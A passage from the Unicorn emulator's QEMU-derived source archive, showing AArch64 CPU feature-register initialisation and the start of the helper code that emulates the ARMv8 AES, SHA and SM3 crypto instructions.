enabled as our emulation supports. * The version of '-cpu max' for qemu-system-arm is defined in cpu.c; * this only needs to handle 64 bits. */ static void aarch64_max_initfn(struct uc_struct *uc, CPUState *obj) { uint64_t t; uint32_t u; ARMCPU *cpu = ARM_CPU(obj); aarch64_a57_initfn(uc, obj); /* * Reset MIDR so the guest doesn't mistake our 'max' CPU type for a real * one and try to apply errata workarounds or use impdef features we * don't provide. * An IMPLEMENTER field of 0 means "reserved for software use"; * ARCHITECTURE must be 0xf indicating "v7 or later, check ID registers * to see which features are present"; * the VARIANT, PARTNUM and REVISION fields are all implementation * defined and we choose to define PARTNUM just in case guest * code needs to distinguish this QEMU CPU from other software * implementations, though this shouldn't be needed. */ FIELD_DP64(0, MIDR_EL1, IMPLEMENTER, 0, t); FIELD_DP64(t, MIDR_EL1, ARCHITECTURE, 0xf ,t); FIELD_DP64(t, MIDR_EL1, PARTNUM, 'Q', t); FIELD_DP64(t, MIDR_EL1, VARIANT, 0, t); FIELD_DP64(t, MIDR_EL1, REVISION, 0, t); cpu->midr = t; t = cpu->isar.id_aa64isar0; FIELD_DP64(t, ID_AA64ISAR0, AES, 2, t); /* AES + PMULL */ FIELD_DP64(t, ID_AA64ISAR0, SHA1, 1, t); FIELD_DP64(t, ID_AA64ISAR0, SHA2, 2, t); /* SHA512 */ FIELD_DP64(t, ID_AA64ISAR0, CRC32, 1, t); FIELD_DP64(t, ID_AA64ISAR0, ATOMIC, 2, t); FIELD_DP64(t, ID_AA64ISAR0, RDM, 1, t); FIELD_DP64(t, ID_AA64ISAR0, SHA3, 1, t); FIELD_DP64(t, ID_AA64ISAR0, SM3, 1, t); FIELD_DP64(t, ID_AA64ISAR0, SM4, 1, t); FIELD_DP64(t, ID_AA64ISAR0, DP, 1, t); FIELD_DP64(t, ID_AA64ISAR0, FHM, 1, t); FIELD_DP64(t, ID_AA64ISAR0, TS, 2, t); /* v8.5-CondM */ FIELD_DP64(t, ID_AA64ISAR0, RNDR, 1, t); cpu->isar.id_aa64isar0 = t; t = cpu->isar.id_aa64isar1; FIELD_DP64(t, ID_AA64ISAR1, DPB, 2, t); FIELD_DP64(t, ID_AA64ISAR1, JSCVT, 1, t); FIELD_DP64(t, ID_AA64ISAR1, FCMA, 1, t); FIELD_DP64(t, ID_AA64ISAR1, APA, 1, t); /* PAuth, architected only */ FIELD_DP64(t, ID_AA64ISAR1, API, 0, t); FIELD_DP64(t, ID_AA64ISAR1, GPA, 1, t); FIELD_DP64(t, ID_AA64ISAR1, GPI, 0, t); FIELD_DP64(t, ID_AA64ISAR1, SB, 1, t); FIELD_DP64(t, ID_AA64ISAR1, SPECRES, 1, t); FIELD_DP64(t, ID_AA64ISAR1, FRINTTS, 1, t); FIELD_DP64(t, ID_AA64ISAR1, LRCPC, 2, t); /* ARMv8.4-RCPC */ cpu->isar.id_aa64isar1 = t; t = cpu->isar.id_aa64pfr0; FIELD_DP64(t, ID_AA64PFR0, SVE, 1, t); FIELD_DP64(t, ID_AA64PFR0, FP, 1, t); FIELD_DP64(t, ID_AA64PFR0, ADVSIMD, 1, t); cpu->isar.id_aa64pfr0 = t; t = cpu->isar.id_aa64pfr1; FIELD_DP64(t, ID_AA64PFR1, BT, 1, t); cpu->isar.id_aa64pfr1 = t; t = cpu->isar.id_aa64mmfr1; FIELD_DP64(t, ID_AA64MMFR1, HPDS, 1, t); /* HPD */ FIELD_DP64(t, ID_AA64MMFR1, LO, 1, t); FIELD_DP64(t, ID_AA64MMFR1, VH, 1, t); FIELD_DP64(t, ID_AA64MMFR1, PAN, 2, t); /* ATS1E1 */ FIELD_DP64(t, ID_AA64MMFR1, VMIDBITS, 2, t); /* VMID16 */ cpu->isar.id_aa64mmfr1 = t; t = cpu->isar.id_aa64mmfr2; FIELD_DP64(t, ID_AA64MMFR2, UAO, 1, t); FIELD_DP64(t, ID_AA64MMFR2, CNP, 1, t); /* TTCNP */ cpu->isar.id_aa64mmfr2 = t; /* Replicate the same data to the 32-bit id registers. 
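     * This keeps the AArch32 view (ID_ISAR*, ID_MMFR*, ID_DFR0) consistent
     * with the AArch64 ID registers above, so a guest running AArch32 at
     * EL0 sees the same feature set.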
     */
    u = cpu->isar.id_isar5;
    FIELD_DP32(u, ID_ISAR5, AES, 2, u); /* AES + PMULL */
    FIELD_DP32(u, ID_ISAR5, SHA1, 1, u);
    FIELD_DP32(u, ID_ISAR5, SHA2, 1, u);
    FIELD_DP32(u, ID_ISAR5, CRC32, 1, u);
    FIELD_DP32(u, ID_ISAR5, RDM, 1, u);
    FIELD_DP32(u, ID_ISAR5, VCMA, 1, u);
    cpu->isar.id_isar5 = u;

    u = cpu->isar.id_isar6;
    FIELD_DP32(u, ID_ISAR6, JSCVT, 1, u);
    FIELD_DP32(u, ID_ISAR6, DP, 1, u);
    FIELD_DP32(u, ID_ISAR6, FHM, 1, u);
    FIELD_DP32(u, ID_ISAR6, SB, 1, u);
    FIELD_DP32(u, ID_ISAR6, SPECRES, 1, u);
    cpu->isar.id_isar6 = u;

    u = cpu->isar.id_mmfr3;
    FIELD_DP32(u, ID_MMFR3, PAN, 2, u); /* ATS1E1 */
    cpu->isar.id_mmfr3 = u;

    u = cpu->isar.id_mmfr4;
    FIELD_DP32(u, ID_MMFR4, HPDS, 1, u); /* AA32HPD */
    FIELD_DP32(u, ID_MMFR4, AC2, 1, u); /* ACTLR2, HACTLR2 */
    FIELD_DP32(u, ID_MMFR4, CNP, 1, u); /* TTCNP */
    cpu->isar.id_mmfr4 = u;

    /* ID_AA64DFR0 is a 64-bit register, so use the 64-bit temporary */
    t = cpu->isar.id_aa64dfr0;
    FIELD_DP64(t, ID_AA64DFR0, PMUVER, 5, t); /* v8.4-PMU */
    cpu->isar.id_aa64dfr0 = t;

    u = cpu->isar.id_dfr0;
    FIELD_DP32(u, ID_DFR0, PERFMON, 5, u); /* v8.4-PMU */
    cpu->isar.id_dfr0 = u;
}

struct ARMCPUInfo {
    const char *name;
    void (*initfn)(struct uc_struct *uc, CPUState *obj);
};

static const ARMCPUInfo aarch64_cpus[] = {
    { .name = "cortex-a57", .initfn = aarch64_a57_initfn },
    { .name = "cortex-a53", .initfn = aarch64_a53_initfn },
    { .name = "cortex-a72", .initfn = aarch64_a72_initfn },
    { .name = "max",        .initfn = aarch64_max_initfn },
};

ARMCPU *cpu_aarch64_init(struct uc_struct *uc)
{
    ARMCPU *cpu;
    CPUState *cs;
    CPUClass *cc;
    CPUARMState *env;

    cpu = calloc(1, sizeof(*cpu));
    if (cpu == NULL) {
        return NULL;
    }

    if (uc->cpu_model == INT_MAX) {
        uc->cpu_model = UC_CPU_ARM64_A72;
    } else if (uc->cpu_model >= ARRAY_SIZE(aarch64_cpus)) {
        /* Bounds check must count array elements, not bytes */
        free(cpu);
        return NULL;
    }

    cs = (CPUState *)cpu;
    cc = (CPUClass *)&cpu->cc;
    cs->cc = cc;
    cs->uc = uc;
    uc->cpu = (CPUState *)cpu;

    /* init CPUClass */
    cpu_class_init(uc, cc);
    /* init ARMCPUClass */
    arm_cpu_class_init(uc, cc);
    /* init CPUState */
    cpu_common_initfn(uc, cs);
    /* init ARMCPU */
    arm_cpu_initfn(uc, cs);

    if (aarch64_cpus[uc->cpu_model].initfn) {
        aarch64_cpus[uc->cpu_model].initfn(uc, cs);
    }

    /* postinit ARMCPU */
    arm_cpu_post_init(cs);
    /* realize ARMCPU */
    arm_cpu_realizefn(uc, cs);

    // init address space
    cpu_address_space_init(cs, 0, cs->memory);
    qemu_init_vcpu(cs);

    env = &cpu->env;
    if (uc->mode & UC_MODE_BIG_ENDIAN) {
        for (int i = 0; i < 4; i++) {
            env->cp15.sctlr_el[i] |= SCTLR_EE;
            env->cp15.sctlr_el[i] |= SCTLR_E0E;
        }
    }

    // Backward compatibility: start at EL1 (EL1h) so that the full
    // 64-bit address space is usable.
env->pstate = PSTATE_MODE_EL1h; arm_rebuild_hflags(env); return cpu; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/crypto_helper.c�������������������������������������������������������0000664�0000000�0000000�00000055244�14675241067�0021255�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * crypto_helper.c - emulate v8 Crypto Extensions instructions * * Copyright (C) 2013 - 2018 Linaro Ltd <ard.biesheuvel@linaro.org> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "crypto/aes.h" union CRYPTO_STATE { uint8_t bytes[16]; uint32_t words[4]; uint64_t l[2]; }; #ifdef HOST_WORDS_BIGENDIAN #define CR_ST_BYTE(state, i) (state.bytes[(15 - (i)) ^ 8]) #define CR_ST_WORD(state, i) (state.words[(3 - (i)) ^ 2]) #else #define CR_ST_BYTE(state, i) (state.bytes[i]) #define CR_ST_WORD(state, i) (state.words[i]) #endif void HELPER(crypto_aese)(void *vd, void *vm, uint32_t decrypt) { static uint8_t const * const sbox[2] = { AES_sbox, AES_isbox }; static uint8_t const * const shift[2] = { AES_shifts, AES_ishifts }; uint64_t *rd = vd; uint64_t *rm = vm; union CRYPTO_STATE rk = { .l = { rm[0], rm[1] } }; union CRYPTO_STATE st = { .l = { rd[0], rd[1] } }; int i; assert(decrypt < 2); /* xor state vector with round key */ rk.l[0] ^= st.l[0]; rk.l[1] ^= st.l[1]; /* combine ShiftRows operation and sbox substitution */ for (i = 0; i < 16; i++) { CR_ST_BYTE(st, i) = sbox[decrypt][CR_ST_BYTE(rk, shift[decrypt][i])]; } rd[0] = st.l[0]; rd[1] = st.l[1]; } void HELPER(crypto_aesmc)(void *vd, void *vm, uint32_t decrypt) { static uint32_t const mc[][256] = { { /* MixColumns lookup table */ 0x00000000, 0x03010102, 0x06020204, 0x05030306, 0x0c040408, 0x0f05050a, 0x0a06060c, 0x0907070e, 0x18080810, 0x1b090912, 0x1e0a0a14, 0x1d0b0b16, 0x140c0c18, 0x170d0d1a, 0x120e0e1c, 0x110f0f1e, 0x30101020, 0x33111122, 0x36121224, 0x35131326, 0x3c141428, 0x3f15152a, 0x3a16162c, 0x3917172e, 0x28181830, 0x2b191932, 0x2e1a1a34, 0x2d1b1b36, 0x241c1c38, 0x271d1d3a, 0x221e1e3c, 0x211f1f3e, 0x60202040, 0x63212142, 0x66222244, 0x65232346, 0x6c242448, 0x6f25254a, 0x6a26264c, 0x6927274e, 0x78282850, 0x7b292952, 0x7e2a2a54, 0x7d2b2b56, 0x742c2c58, 0x772d2d5a, 0x722e2e5c, 0x712f2f5e, 0x50303060, 0x53313162, 0x56323264, 0x55333366, 0x5c343468, 0x5f35356a, 0x5a36366c, 0x5937376e, 0x48383870, 0x4b393972, 0x4e3a3a74, 0x4d3b3b76, 0x443c3c78, 0x473d3d7a, 0x423e3e7c, 0x413f3f7e, 0xc0404080, 0xc3414182, 0xc6424284, 0xc5434386, 0xcc444488, 0xcf45458a, 0xca46468c, 0xc947478e, 0xd8484890, 0xdb494992, 0xde4a4a94, 0xdd4b4b96, 0xd44c4c98, 0xd74d4d9a, 0xd24e4e9c, 0xd14f4f9e, 0xf05050a0, 0xf35151a2, 0xf65252a4, 0xf55353a6, 0xfc5454a8, 0xff5555aa, 0xfa5656ac, 0xf95757ae, 0xe85858b0, 
0xeb5959b2, 0xee5a5ab4, 0xed5b5bb6, 0xe45c5cb8, 0xe75d5dba, 0xe25e5ebc, 0xe15f5fbe, 0xa06060c0, 0xa36161c2, 0xa66262c4, 0xa56363c6, 0xac6464c8, 0xaf6565ca, 0xaa6666cc, 0xa96767ce, 0xb86868d0, 0xbb6969d2, 0xbe6a6ad4, 0xbd6b6bd6, 0xb46c6cd8, 0xb76d6dda, 0xb26e6edc, 0xb16f6fde, 0x907070e0, 0x937171e2, 0x967272e4, 0x957373e6, 0x9c7474e8, 0x9f7575ea, 0x9a7676ec, 0x997777ee, 0x887878f0, 0x8b7979f2, 0x8e7a7af4, 0x8d7b7bf6, 0x847c7cf8, 0x877d7dfa, 0x827e7efc, 0x817f7ffe, 0x9b80801b, 0x98818119, 0x9d82821f, 0x9e83831d, 0x97848413, 0x94858511, 0x91868617, 0x92878715, 0x8388880b, 0x80898909, 0x858a8a0f, 0x868b8b0d, 0x8f8c8c03, 0x8c8d8d01, 0x898e8e07, 0x8a8f8f05, 0xab90903b, 0xa8919139, 0xad92923f, 0xae93933d, 0xa7949433, 0xa4959531, 0xa1969637, 0xa2979735, 0xb398982b, 0xb0999929, 0xb59a9a2f, 0xb69b9b2d, 0xbf9c9c23, 0xbc9d9d21, 0xb99e9e27, 0xba9f9f25, 0xfba0a05b, 0xf8a1a159, 0xfda2a25f, 0xfea3a35d, 0xf7a4a453, 0xf4a5a551, 0xf1a6a657, 0xf2a7a755, 0xe3a8a84b, 0xe0a9a949, 0xe5aaaa4f, 0xe6abab4d, 0xefacac43, 0xecadad41, 0xe9aeae47, 0xeaafaf45, 0xcbb0b07b, 0xc8b1b179, 0xcdb2b27f, 0xceb3b37d, 0xc7b4b473, 0xc4b5b571, 0xc1b6b677, 0xc2b7b775, 0xd3b8b86b, 0xd0b9b969, 0xd5baba6f, 0xd6bbbb6d, 0xdfbcbc63, 0xdcbdbd61, 0xd9bebe67, 0xdabfbf65, 0x5bc0c09b, 0x58c1c199, 0x5dc2c29f, 0x5ec3c39d, 0x57c4c493, 0x54c5c591, 0x51c6c697, 0x52c7c795, 0x43c8c88b, 0x40c9c989, 0x45caca8f, 0x46cbcb8d, 0x4fcccc83, 0x4ccdcd81, 0x49cece87, 0x4acfcf85, 0x6bd0d0bb, 0x68d1d1b9, 0x6dd2d2bf, 0x6ed3d3bd, 0x67d4d4b3, 0x64d5d5b1, 0x61d6d6b7, 0x62d7d7b5, 0x73d8d8ab, 0x70d9d9a9, 0x75dadaaf, 0x76dbdbad, 0x7fdcdca3, 0x7cdddda1, 0x79dedea7, 0x7adfdfa5, 0x3be0e0db, 0x38e1e1d9, 0x3de2e2df, 0x3ee3e3dd, 0x37e4e4d3, 0x34e5e5d1, 0x31e6e6d7, 0x32e7e7d5, 0x23e8e8cb, 0x20e9e9c9, 0x25eaeacf, 0x26ebebcd, 0x2fececc3, 0x2cededc1, 0x29eeeec7, 0x2aefefc5, 0x0bf0f0fb, 0x08f1f1f9, 0x0df2f2ff, 0x0ef3f3fd, 0x07f4f4f3, 0x04f5f5f1, 0x01f6f6f7, 0x02f7f7f5, 0x13f8f8eb, 0x10f9f9e9, 0x15fafaef, 0x16fbfbed, 0x1ffcfce3, 0x1cfdfde1, 0x19fefee7, 0x1affffe5, }, { /* Inverse MixColumns lookup table */ 0x00000000, 0x0b0d090e, 0x161a121c, 0x1d171b12, 0x2c342438, 0x27392d36, 0x3a2e3624, 0x31233f2a, 0x58684870, 0x5365417e, 0x4e725a6c, 0x457f5362, 0x745c6c48, 0x7f516546, 0x62467e54, 0x694b775a, 0xb0d090e0, 0xbbdd99ee, 0xa6ca82fc, 0xadc78bf2, 0x9ce4b4d8, 0x97e9bdd6, 0x8afea6c4, 0x81f3afca, 0xe8b8d890, 0xe3b5d19e, 0xfea2ca8c, 0xf5afc382, 0xc48cfca8, 0xcf81f5a6, 0xd296eeb4, 0xd99be7ba, 0x7bbb3bdb, 0x70b632d5, 0x6da129c7, 0x66ac20c9, 0x578f1fe3, 0x5c8216ed, 0x41950dff, 0x4a9804f1, 0x23d373ab, 0x28de7aa5, 0x35c961b7, 0x3ec468b9, 0x0fe75793, 0x04ea5e9d, 0x19fd458f, 0x12f04c81, 0xcb6bab3b, 0xc066a235, 0xdd71b927, 0xd67cb029, 0xe75f8f03, 0xec52860d, 0xf1459d1f, 0xfa489411, 0x9303e34b, 0x980eea45, 0x8519f157, 0x8e14f859, 0xbf37c773, 0xb43ace7d, 0xa92dd56f, 0xa220dc61, 0xf66d76ad, 0xfd607fa3, 0xe07764b1, 0xeb7a6dbf, 0xda595295, 0xd1545b9b, 0xcc434089, 0xc74e4987, 0xae053edd, 0xa50837d3, 0xb81f2cc1, 0xb31225cf, 0x82311ae5, 0x893c13eb, 0x942b08f9, 0x9f2601f7, 0x46bde64d, 0x4db0ef43, 0x50a7f451, 0x5baafd5f, 0x6a89c275, 0x6184cb7b, 0x7c93d069, 0x779ed967, 0x1ed5ae3d, 0x15d8a733, 0x08cfbc21, 0x03c2b52f, 0x32e18a05, 0x39ec830b, 0x24fb9819, 0x2ff69117, 0x8dd64d76, 0x86db4478, 0x9bcc5f6a, 0x90c15664, 0xa1e2694e, 0xaaef6040, 0xb7f87b52, 0xbcf5725c, 0xd5be0506, 0xdeb30c08, 0xc3a4171a, 0xc8a91e14, 0xf98a213e, 0xf2872830, 0xef903322, 0xe49d3a2c, 0x3d06dd96, 0x360bd498, 0x2b1ccf8a, 0x2011c684, 0x1132f9ae, 0x1a3ff0a0, 0x0728ebb2, 0x0c25e2bc, 0x656e95e6, 0x6e639ce8, 0x737487fa, 0x78798ef4, 0x495ab1de, 
0x4257b8d0, 0x5f40a3c2, 0x544daacc, 0xf7daec41, 0xfcd7e54f, 0xe1c0fe5d, 0xeacdf753, 0xdbeec879, 0xd0e3c177, 0xcdf4da65, 0xc6f9d36b, 0xafb2a431, 0xa4bfad3f, 0xb9a8b62d, 0xb2a5bf23, 0x83868009, 0x888b8907, 0x959c9215, 0x9e919b1b, 0x470a7ca1, 0x4c0775af, 0x51106ebd, 0x5a1d67b3, 0x6b3e5899, 0x60335197, 0x7d244a85, 0x7629438b, 0x1f6234d1, 0x146f3ddf, 0x097826cd, 0x02752fc3, 0x335610e9, 0x385b19e7, 0x254c02f5, 0x2e410bfb, 0x8c61d79a, 0x876cde94, 0x9a7bc586, 0x9176cc88, 0xa055f3a2, 0xab58faac, 0xb64fe1be, 0xbd42e8b0, 0xd4099fea, 0xdf0496e4, 0xc2138df6, 0xc91e84f8, 0xf83dbbd2, 0xf330b2dc, 0xee27a9ce, 0xe52aa0c0, 0x3cb1477a, 0x37bc4e74, 0x2aab5566, 0x21a65c68, 0x10856342, 0x1b886a4c, 0x069f715e, 0x0d927850, 0x64d90f0a, 0x6fd40604, 0x72c31d16, 0x79ce1418, 0x48ed2b32, 0x43e0223c, 0x5ef7392e, 0x55fa3020, 0x01b79aec, 0x0aba93e2, 0x17ad88f0, 0x1ca081fe, 0x2d83bed4, 0x268eb7da, 0x3b99acc8, 0x3094a5c6, 0x59dfd29c, 0x52d2db92, 0x4fc5c080, 0x44c8c98e, 0x75ebf6a4, 0x7ee6ffaa, 0x63f1e4b8, 0x68fcedb6, 0xb1670a0c, 0xba6a0302, 0xa77d1810, 0xac70111e, 0x9d532e34, 0x965e273a, 0x8b493c28, 0x80443526, 0xe90f427c, 0xe2024b72, 0xff155060, 0xf418596e, 0xc53b6644, 0xce366f4a, 0xd3217458, 0xd82c7d56, 0x7a0ca137, 0x7101a839, 0x6c16b32b, 0x671bba25, 0x5638850f, 0x5d358c01, 0x40229713, 0x4b2f9e1d, 0x2264e947, 0x2969e049, 0x347efb5b, 0x3f73f255, 0x0e50cd7f, 0x055dc471, 0x184adf63, 0x1347d66d, 0xcadc31d7, 0xc1d138d9, 0xdcc623cb, 0xd7cb2ac5, 0xe6e815ef, 0xede51ce1, 0xf0f207f3, 0xfbff0efd, 0x92b479a7, 0x99b970a9, 0x84ae6bbb, 0x8fa362b5, 0xbe805d9f, 0xb58d5491, 0xa89a4f83, 0xa397468d, } }; uint64_t *rd = vd; uint64_t *rm = vm; union CRYPTO_STATE st = { .l = { rm[0], rm[1] } }; int i; assert(decrypt < 2); for (i = 0; i < 16; i += 4) { CR_ST_WORD(st, i >> 2) = mc[decrypt][CR_ST_BYTE(st, i)] ^ rol32(mc[decrypt][CR_ST_BYTE(st, i + 1)], 8) ^ rol32(mc[decrypt][CR_ST_BYTE(st, i + 2)], 16) ^ rol32(mc[decrypt][CR_ST_BYTE(st, i + 3)], 24); } rd[0] = st.l[0]; rd[1] = st.l[1]; } /* * SHA-1 logical functions */ static uint32_t cho(uint32_t x, uint32_t y, uint32_t z) { return (x & (y ^ z)) ^ z; } static uint32_t par(uint32_t x, uint32_t y, uint32_t z) { return x ^ y ^ z; } static uint32_t maj(uint32_t x, uint32_t y, uint32_t z) { return (x & y) | ((x | y) & z); } void HELPER(crypto_sha1_3reg)(void *vd, void *vn, void *vm, uint32_t op) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; if (op == 3) { /* sha1su0 */ d.l[0] ^= d.l[1] ^ m.l[0]; d.l[1] ^= n.l[0] ^ m.l[1]; } else { int i; for (i = 0; i < 4; i++) { uint32_t t = 0; switch (op) { case 0: /* sha1c */ t = cho(CR_ST_WORD(d, 1), CR_ST_WORD(d, 2), CR_ST_WORD(d, 3)); break; case 1: /* sha1p */ t = par(CR_ST_WORD(d, 1), CR_ST_WORD(d, 2), CR_ST_WORD(d, 3)); break; case 2: /* sha1m */ t = maj(CR_ST_WORD(d, 1), CR_ST_WORD(d, 2), CR_ST_WORD(d, 3)); break; default: g_assert_not_reached(); } t += rol32(CR_ST_WORD(d, 0), 5) + CR_ST_WORD(n, 0) + CR_ST_WORD(m, i); CR_ST_WORD(n, 0) = CR_ST_WORD(d, 3); CR_ST_WORD(d, 3) = CR_ST_WORD(d, 2); CR_ST_WORD(d, 2) = ror32(CR_ST_WORD(d, 1), 2); CR_ST_WORD(d, 1) = CR_ST_WORD(d, 0); CR_ST_WORD(d, 0) = t; } } rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sha1h)(void *vd, void *vm) { uint64_t *rd = vd; uint64_t *rm = vm; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; CR_ST_WORD(m, 0) = ror32(CR_ST_WORD(m, 0), 2); CR_ST_WORD(m, 1) = CR_ST_WORD(m, 2) = CR_ST_WORD(m, 3) = 0; rd[0] = m.l[0]; rd[1] = 
m.l[1]; } void HELPER(crypto_sha1su1)(void *vd, void *vm) { uint64_t *rd = vd; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; CR_ST_WORD(d, 0) = rol32(CR_ST_WORD(d, 0) ^ CR_ST_WORD(m, 1), 1); CR_ST_WORD(d, 1) = rol32(CR_ST_WORD(d, 1) ^ CR_ST_WORD(m, 2), 1); CR_ST_WORD(d, 2) = rol32(CR_ST_WORD(d, 2) ^ CR_ST_WORD(m, 3), 1); CR_ST_WORD(d, 3) = rol32(CR_ST_WORD(d, 3) ^ CR_ST_WORD(d, 0), 1); rd[0] = d.l[0]; rd[1] = d.l[1]; } /* * The SHA-256 logical functions, according to * http://csrc.nist.gov/groups/STM/cavp/documents/shs/sha256-384-512.pdf */ static uint32_t S0(uint32_t x) { return ror32(x, 2) ^ ror32(x, 13) ^ ror32(x, 22); } static uint32_t S1(uint32_t x) { return ror32(x, 6) ^ ror32(x, 11) ^ ror32(x, 25); } static uint32_t s0(uint32_t x) { return ror32(x, 7) ^ ror32(x, 18) ^ (x >> 3); } static uint32_t s1(uint32_t x) { return ror32(x, 17) ^ ror32(x, 19) ^ (x >> 10); } void HELPER(crypto_sha256h)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; int i; for (i = 0; i < 4; i++) { uint32_t t = cho(CR_ST_WORD(n, 0), CR_ST_WORD(n, 1), CR_ST_WORD(n, 2)) + CR_ST_WORD(n, 3) + S1(CR_ST_WORD(n, 0)) + CR_ST_WORD(m, i); CR_ST_WORD(n, 3) = CR_ST_WORD(n, 2); CR_ST_WORD(n, 2) = CR_ST_WORD(n, 1); CR_ST_WORD(n, 1) = CR_ST_WORD(n, 0); CR_ST_WORD(n, 0) = CR_ST_WORD(d, 3) + t; t += maj(CR_ST_WORD(d, 0), CR_ST_WORD(d, 1), CR_ST_WORD(d, 2)) + S0(CR_ST_WORD(d, 0)); CR_ST_WORD(d, 3) = CR_ST_WORD(d, 2); CR_ST_WORD(d, 2) = CR_ST_WORD(d, 1); CR_ST_WORD(d, 1) = CR_ST_WORD(d, 0); CR_ST_WORD(d, 0) = t; } rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sha256h2)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; int i; for (i = 0; i < 4; i++) { uint32_t t = cho(CR_ST_WORD(d, 0), CR_ST_WORD(d, 1), CR_ST_WORD(d, 2)) + CR_ST_WORD(d, 3) + S1(CR_ST_WORD(d, 0)) + CR_ST_WORD(m, i); CR_ST_WORD(d, 3) = CR_ST_WORD(d, 2); CR_ST_WORD(d, 2) = CR_ST_WORD(d, 1); CR_ST_WORD(d, 1) = CR_ST_WORD(d, 0); CR_ST_WORD(d, 0) = CR_ST_WORD(n, 3 - i) + t; } rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sha256su0)(void *vd, void *vm) { uint64_t *rd = vd; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; CR_ST_WORD(d, 0) += s0(CR_ST_WORD(d, 1)); CR_ST_WORD(d, 1) += s0(CR_ST_WORD(d, 2)); CR_ST_WORD(d, 2) += s0(CR_ST_WORD(d, 3)); CR_ST_WORD(d, 3) += s0(CR_ST_WORD(m, 0)); rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sha256su1)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; CR_ST_WORD(d, 0) += s1(CR_ST_WORD(m, 2)) + CR_ST_WORD(n, 1); CR_ST_WORD(d, 1) += s1(CR_ST_WORD(m, 3)) + CR_ST_WORD(n, 2); CR_ST_WORD(d, 2) += s1(CR_ST_WORD(d, 0)) + CR_ST_WORD(n, 3); CR_ST_WORD(d, 3) += s1(CR_ST_WORD(d, 1)) + CR_ST_WORD(m, 0); rd[0] = d.l[0]; rd[1] = d.l[1]; } /* * The SHA-512 logical functions (same as above but using 64-bit operands) */ static uint64_t cho512(uint64_t x, uint64_t y, uint64_t z) { return (x & (y ^ z)) ^ z; } static uint64_t 
maj512(uint64_t x, uint64_t y, uint64_t z) { return (x & y) | ((x | y) & z); } static uint64_t S0_512(uint64_t x) { return ror64(x, 28) ^ ror64(x, 34) ^ ror64(x, 39); } static uint64_t S1_512(uint64_t x) { return ror64(x, 14) ^ ror64(x, 18) ^ ror64(x, 41); } static uint64_t s0_512(uint64_t x) { return ror64(x, 1) ^ ror64(x, 8) ^ (x >> 7); } static uint64_t s1_512(uint64_t x) { return ror64(x, 19) ^ ror64(x, 61) ^ (x >> 6); } void HELPER(crypto_sha512h)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; uint64_t d0 = rd[0]; uint64_t d1 = rd[1]; d1 += S1_512(rm[1]) + cho512(rm[1], rn[0], rn[1]); d0 += S1_512(d1 + rm[0]) + cho512(d1 + rm[0], rm[1], rn[0]); rd[0] = d0; rd[1] = d1; } void HELPER(crypto_sha512h2)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; uint64_t d0 = rd[0]; uint64_t d1 = rd[1]; d1 += S0_512(rm[0]) + maj512(rn[0], rm[1], rm[0]); d0 += S0_512(d1) + maj512(d1, rm[0], rm[1]); rd[0] = d0; rd[1] = d1; } void HELPER(crypto_sha512su0)(void *vd, void *vn) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t d0 = rd[0]; uint64_t d1 = rd[1]; d0 += s0_512(rd[1]); d1 += s0_512(rn[0]); rd[0] = d0; rd[1] = d1; } void HELPER(crypto_sha512su1)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; rd[0] += s1_512(rn[0]) + rm[0]; rd[1] += s1_512(rn[1]) + rm[1]; } void HELPER(crypto_sm3partw1)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; uint32_t t; t = CR_ST_WORD(d, 0) ^ CR_ST_WORD(n, 0) ^ ror32(CR_ST_WORD(m, 1), 17); CR_ST_WORD(d, 0) = t ^ ror32(t, 17) ^ ror32(t, 9); t = CR_ST_WORD(d, 1) ^ CR_ST_WORD(n, 1) ^ ror32(CR_ST_WORD(m, 2), 17); CR_ST_WORD(d, 1) = t ^ ror32(t, 17) ^ ror32(t, 9); t = CR_ST_WORD(d, 2) ^ CR_ST_WORD(n, 2) ^ ror32(CR_ST_WORD(m, 3), 17); 